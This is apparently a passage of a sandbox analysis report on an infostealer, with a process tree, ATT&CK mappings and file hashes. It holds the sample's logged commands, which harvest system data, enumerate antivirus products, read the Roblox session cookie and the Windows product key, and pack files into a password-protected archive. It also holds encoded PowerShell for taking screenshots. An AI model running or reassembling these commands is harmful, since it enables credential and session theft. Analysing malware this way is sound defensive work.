GMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3472
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\40y5pvrt\40y5pvrt.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2212
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2B80.tmp" "c:\Users\Admin\AppData\Local\Temp\40y5pvrt\CSCDB392CDFB932424C9785E97C1BE71F76.TMP"
        6⤵
        
        PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4484
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3352
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2872
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1020
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1868
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4688
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4184
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1020
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29202\rar.exe a -r -hp"yeetermeeterbigmaceater080402" "C:\Users\Admin\AppData\Local\Temp\g5WkJ.zip" *"
    3⤵
    PID:2292
  - - C:\Users\Admin\AppData\Local\Temp\_MEI29202\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI29202\rar.exe a -r -hp"yeetermeeterbigmaceater080402" "C:\Users\Admin\AppData\Local\Temp\g5WkJ.zip" *
      4⤵
      Executes dropped EXE
      PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:5048
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8f0389758,0x7ff8f0389768,0x7ff8f0389778
  2⤵
  PID:4540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2040 --field-trial-handle=1832,i,8539049053281590483,12183791981706871014,131072 /prefetch:8
  2⤵
  PID:2068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1780 --field-trial-handle=1832,i,8539049053281590483,12183791981706871014,131072 /prefetch:8
  2⤵
  PID:1016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=1832,i,8539049053281590483,12183791981706871014,131072 /prefetch:2
  2⤵
  PID:3900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2852 --field-trial-handle=1832,i,8539049053281590483,12183791981706871014,131072 /prefetch:1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2832 --field-trial-handle=1832,i,8539049053281590483,12183791981706871014,131072 /prefetch:1
  2⤵
  PID:2520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4400 --field-trial-handle=1832,i,8539049053281590483,12183791981706871014,131072 /prefetch:1
  2⤵
  PID:2208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4552 --field-trial-handle=1832,i,8539049053281590483,12183791981706871014,131072 /prefetch:8
  2⤵
  PID:600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3704 --field-trial-handle=1832,i,8539049053281590483,12183791981706871014,131072 /prefetch:8
  2⤵
  PID:3964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4764 --field-trial-handle=1832,i,8539049053281590483,12183791981706871014,131072 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4572 --field-trial-handle=1832,i,8539049053281590483,12183791981706871014,131072 /prefetch:8
  2⤵
  PID:2412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4312 --field-trial-handle=1832,i,8539049053281590483,12183791981706871014,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4504

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3224

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
a6672593c184df48f8bfa85738fb219e

SHA1
db86056ff8a41e13a26597aafa856088bf98332b

SHA256
8a39d70b4dfe79071837f9895632717d285c942ae1dd35a99a610e20d959798e

SHA512
6e184e478d87f2afe3b06e90fb1b83c5b9bcef610c5c4ecaf080d313a7ae252ea540fc351bb727d174c342cbfd889407bbd9be87296d3c19a8f8f5bc65fd0a5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
0b3fab519656dd1b4b0bde75606429b0

SHA1
183e3264b254c6cc2e3f099bb2b9b077089fb86a

SHA256
286dccfe635f44b7e80c15e705874c2cf49662758cbec7a03a4661000113a61d

SHA512
caf4088e8df36b1103b4371bfc2effdddf54a0971b66281815c0c25dcc25edf7835ffdcc6b858dd4c6c988fd681f6a13e051ab58d84ae6f36419d358508e8972

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
3fb85024f383c9d9ceed1bc93247099a

SHA1
5a46d098aee03eac1be23e7f98fb50d227170df4

SHA256
e24068f51771c15bc8f569cb91751d0dc9be1e2d649d467f2ade5d0deeb8377c

SHA512
56a49d237a7c5de07669ce5f630008a2970539b7cc0888d1f83f21ce753c9e8f8d2991915e509e1c6f583ab3fd9afb8cff456d19013a947e2d74bbd75184a0ee

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
b103ed680aa2bbb2db0ba3c1111cd128

SHA1
a329d84200b526f3ead8e93fe31fe4a5b8384538

SHA256
b306740a0ebdbfa115e0501ea1ef67f6ea7d7d5f62ebb3bd6616b0e0f85355ba

SHA512
e8c2e273f1afabc93aca36e534d164b17d28c218acd316232e97760325c225eca0d71964c3e5bf65974fdcde0405e0bdd35443f096a039c85e6930d3978d82b3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
3832d4204cedd924ea24d6d7e17ddac1

SHA1
9d681d1c5a2454f7205497d748416aca62218cbc

SHA256
d599096511b8689c74d005cc7ebad99d30174f488b338bd02433c17620654d10

SHA512
c40b23fd7ba3f7d3cae17111d109800df898839ce1feda734c4570928da600cd9e2fb2f771055200301622a45fea8fbde8e38fc0c3beda826d55372945109a4b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
190KB

MD5
413d5569bc658143ecdf4551d3d18152

SHA1
4d4da27c4fec83e6abfb4f872116ffa3359ee431

SHA256
16e3bccd80c52f2f1f3688fd0153ca504d331f36430cdb0bbed57c8763ae6618

SHA512
6cf26c1dacbf77d4cc473e35f9fd7fa7ddecafa4eeb94198c9bc1645495d5d64e7c7c248eb23941332b2ea74309da9af99db71481b32b477e95bb115c056bc8f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
b33899a3ad59378f79cae6c051d9774c

SHA1
96d15df9804383a3aa0d6078be7ab133ffef08cf

SHA256
db0352f72e8ab92f4bd63276cfdb52381d2b58c2e1cc2ba99dd544ea41e12f6b

SHA512
7126bd179154ede17d2e95c79222196bdd9d8ac5f3db1c1586f0782c1dc7dabbe95f0c08d6730c7b76eca2a65039ef69276a5954e049d5132ab6afcfedc742b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
17084a852ce8ab31972044cd416e8204

SHA1
2edba5025d221493b4ad4a3eab5001f8cd52990f

SHA256
576ff9cfb611ce04dc2869570921a161315286f74f023894fcce3edd45377b61

SHA512
df56e0a499809634aeac4b70bdaa420d90e12e535250f44e02fb16ce08aaa7f29be5fb641d3087f7c6ef71a289c7eaf9eead8ecd92ff6826db9178d03dff8496

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
69793dfc193ed509fcec07df6efaf42b

SHA1
f2f6b4dc7689ca18f565e64d89c5e9a8e15434c6

SHA256
64ee0ac68f1cd0b92f9b006cbeb54be82fe44d9e80c0771df4bd4b6a1205a944

SHA512
79168b164b9b6e419441460e7a15ca920b02396503892a041459e7ba77348cd55681025481f549aae3b27f451f399fe0d07f0eed523e526d91aa0a15f4ad8e54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e918a1238bb66a6405bfc12066790ce7

SHA1
04b161912822b236f26ebb79fcfca7918d949ed3

SHA256
aa409beb942c7861e922d2d325d94ed654c56f0b6292f8a6fc6f1844ce3e8c2a

SHA512
65c26c5fa841b3dae57771efd4957f9aa7b98570e3b98a215873aa7317bbb4dee58741e19a5d2246beec7a799b8741d5c3270d039251f0f93278b0c6083d15da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e918a1238bb66a6405bfc12066790ce7

SHA1
04b161912822b236f26ebb79fcfca7918d949ed3

SHA256
aa409beb942c7861e922d2d325d94ed654c56f0b6292f8a6fc6f1844ce3e8c2a

SHA512
65c26c5fa841b3dae57771efd4957f9aa7b98570e3b98a215873aa7317bbb4dee58741e19a5d2246beec7a799b8741d5c3270d039251f0f93278b0c6083d15da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b528a4a11a6b092a9c19d289c9dae016

SHA1
f78ed2cd1b31befe5b2a6ea375ef97f1ed6977f3

SHA256
30ec187036fcff811ca1dfe1c920774b5dc5b50433aa671e76831ed0e8631758

SHA512
082a3b57c52ff707649bcf940eebb801b8228de06a641428e045ed15e237eb2920f3e8f520fb6b945f8f1b9d84a38366bc494ccec1e574937405d1f24108b0d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\40y5pvrt\40y5pvrt.dll

Filesize
4KB

MD5
91a82b415cbdb004db6da35e5aee860f

SHA1
94e624ea592032b7145ab409d1e019292fc2c0dc

SHA256
e5da4762da7ad1f9236f1c5a5805fe872cf82aded1aec262e56de9e52c17f7ee

SHA512
43ce0e4e55bdb050494b1d81847df292be48531f69387d0ee201ff62aa706d3a21ca33b69b576c0a16e1e7aa21d62f85a9eff486089de281cdc09b77a068dc44

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2B80.tmp

Filesize
1KB

MD5
d20b02c0f18a5e25421169d54d28d505

SHA1
b983c088576709f88215e07ab47cff33c6dab336

SHA256
11d38247d21572ec9a53c7975cf15b7174301a2337495068a62ec4676cbc43d7

SHA512
cd99d27bc129d4ae003ded6e98e3cea9b54710c20e7ed845f828a6713a806d616aa678a066f80a4afc45482b56d65efc6d64e2a54b2b3918caaab528f99bfd5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29202\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29202\_bz2.pyd

Filesize
48KB

MD5
2d461b41f6e9a305dde68e9c59e4110a

SHA1
97c2266f47a651e37a72c153116d81d93c7556e8

SHA256
abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4

SHA512
eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29202\_ctypes.pyd

Filesize
58KB

MD5
1adfe4d0f4d68c9c539489b89717984d

SHA1
8ae31b831b3160f5b88dda58ad3959c7423f8eb2

SHA256
64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c

SHA512
b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29202\_hashlib.pyd

Filesize
35KB

MD5
f10d896ed25751ead72d8b03e404ea36

SHA1
eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb

SHA256
3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3

SHA512
7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29202\_lzma.pyd

Filesize
85KB

MD5
3798175fd77eded46a8af6b03c5e5f6d

SHA1
f637eaf42080dcc620642400571473a3fdf9174f

SHA256
3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41

SHA512
1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29202\_queue.pyd

Filesize
25KB

MD5
decdabaca104520549b0f66c136a9dc1

SHA1
423e6f3100013e5a2c97e65e94834b1b18770a87

SHA256
9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84

SHA512
d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29202\_socket.pyd

Filesize
43KB

MD5
bcc3e26a18d59d76fd6cf7cd64e9e14d

SHA1
b85e4e7d300dbeec942cb44e4a38f2c6314d3166

SHA256
4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98

SHA512
65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29202\_sqlite3.pyd

Filesize
56KB

MD5
eb6313b94292c827a5758eea82d018d9

SHA1
7070f715d088c669eda130d0f15e4e4e9c4b7961

SHA256
6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da

SHA512
23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI29202\_ssl.pyd

Filesize
62KB

MD5
2089768e25606262921e4424a590ff05

SHA1
bc94a8ff462547ab48c2fbf705673a1552545b76

SHA256
3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca

SHA512
371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86

Download Submit
